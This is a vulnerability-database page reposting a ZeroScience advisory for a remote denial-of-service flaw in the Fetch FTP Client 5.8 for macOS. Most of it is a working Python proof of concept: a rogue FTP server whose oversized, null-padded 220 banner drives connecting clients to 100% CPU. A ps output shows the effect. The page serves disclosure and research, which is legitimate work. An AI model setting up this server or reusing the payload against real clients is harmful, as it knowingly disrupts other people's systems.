Fetch Softworks Fetch FTP Client 5.8 Denial Of Service

2022.01.28
Credit: LiquidWorm
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

#!/usr/bin/env python # # # Fetch Softworks Fetch FTP Client 5.8 Remote CPU Consumption (Denial of Service) # # # Vendor: Fetch Softworks # Product web page: https://www.fetchsoftworks.com # Affected version: 5.8.2 (5K1354) # # Summary: Fetch is a reliable, full-featured file transfer client for the # Apple Macintosh whose user interface emphasizes simplicity and ease of use. # Fetch supports FTP and SFTP, the most popular file transfer protocols on # the Internet for compatibility with thousands of Internet service providers, # web hosting companies, publishers, pre-press companies, and more. # # Desc: The application is prone to a DoS after receiving a long server response # (more than 2K bytes) leading to 100% CPU consumption. # # -------------------------------------------------------------------------------- # ~/Desktop> ps ucp 3498 # USER PID %CPU %MEM VSZ RSS TT STAT STARTED TIME COMMAND # lqwrm 3498 100.0 0.5 60081236 54488 ?? R 5:44PM 4:28.97 Fetch-5K1354-266470421 # ~/Desktop> # -------------------------------------------------------------------------------- # # Tested on: macOS Monterey 12.2 # macOS Big Sur 11.6.2 # # # Vulnerability discovered by Gjoko 'LiquidWorm' Krstic # @zeroscience # # # Advisory ID: ZSL-2022-5696 # Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5696.php # # # 27.01.2022 # import socket host = '0.0.0.0' port = 21 s = socket.socket() s.bind((host, port)) s.listen(2) print('Ascolto su', host, 'porta', port, '...') consumptor = '220\x20' consumptor += 'ftp.zeroscience.mk' consumptor += '\x00' * 0x101E consumptor += '\x0D\x0A' while True: try: c, a = s.accept() print('Connessione da', a) print('CPU 100%, Memory++') c.send(bytes(consumptor, 'UTF-8')) c.send(b'Thricer OK, p\'taah\x0A\x0D') print(c.recv(17)) except: break


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2022, cxsecurity.com

 

Back to Top